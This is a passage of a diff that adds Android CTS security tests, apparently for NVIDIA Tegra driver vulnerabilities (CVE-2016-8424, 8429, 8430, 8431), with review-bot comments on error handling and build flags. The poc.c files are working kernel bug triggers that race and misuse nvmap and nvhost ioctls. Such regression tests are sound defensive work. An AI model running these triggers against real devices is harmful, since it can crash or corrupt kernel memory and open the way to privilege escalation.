+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
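Review bot: Every `trigger_*` helper prints `errno` after its `ioctl` without looking at the return value, so on success the log shows whatever error an earlier call left behind, repeated for each of the `MAX_HANDLE_NUM` iterations. Test the result first, e.g. `if (ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc) < 0) printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);`. `int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};` sets only element 0 to -1 and the rest to 0, which is probably not what was meant, and `g_handles_for_free` is never used. `trigger_rw_handle` ignores its `handle` parameter, and the `calloc`/`malloc` results in `prepare_data` are used without a NULL check. The unconditional errno prints also occur in `setup_privi_and_affinity` and `prepare_data` of CVE-2016-8424/poc.c.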
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
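Review bot: In `setup_privi_and_affinity` the `if (sched_setaffinity(...) < 0) { }` branch is empty and the `setpriority` result is not checked. A failed CPU pin or a refused priority of -10 therefore goes unreported, and the run proceeds under conditions the test did not intend. Log both, e.g. `printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);`, as the CVE-2016-8424 copy of this function does. `prepare_data` writes through the `memalign` result without a NULL check and prints `errno` after `mprotect` regardless of its return value. `trigger_nvmap_create_dup`, `trigger_nvmap_alloc`, `trigger_nvmap_free` and `g_allocation_dup` are never referenced from `main` or `race_thread` and can be removed, along with the commented-out `malloc` line.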
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
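Review bot: The warning and hardening flags on the four `CFLAGS +=` lines and the `LDFLAGS += -rdynamic` line are assigned to plain make variables rather than the module's `LOCAL_CFLAGS`/`LOCAL_LDFLAGS`, so they most likely never reach the compiler for this module, and `include $(CLEAR_VARS)` does not reset them between modules. If `-D_FORTIFY_SOURCE=2` and the `-W` set are meant to apply to the test binary, write them as `LOCAL_CFLAGS += -Wall -W ...` and `LOCAL_LDFLAGS += -rdynamic`. `-Iinclude` would normally be expressed as `LOCAL_C_INCLUDES := $(LOCAL_PATH)/include`, though no `include` directory is visible in this change, so it may simply be droppable. The same lines recur in the Android.mk files added for CVE-2016-8431, CVE-2016-8432 and CVE-2016-8434.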
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
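Review bot: Every ioctl result on the setup path is discarded (`trigger_nvmap_create`, `trigger_nvmap_alloc`, and the call chain in `main`), so a run where `NVMAP_IOC_CREATE` or `NVMAP_IOC_ALLOC` fails still starts both threads, sleeps 100 seconds and returns 0, which is indistinguishable from a run against a fixed driver. Logging the failure in the same style `open_driver` already uses, e.g. `if (ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc) < 0) printf("NVMAP_IOC_ALLOC failed, errno=%d\n", errno);`, and bailing out of `main` before `pthread_create` would let whoever reads the result separate "setup failed" from "ran to completion". `open_driver` also leaves `g_fd` open when the second `open` fails, and `trigger_channel_open`, `trigger_nvmap_free` and `g_channel_fd` are never used by `main`; a one-line comment on why they are kept, or removing them, would help the next reader.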
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
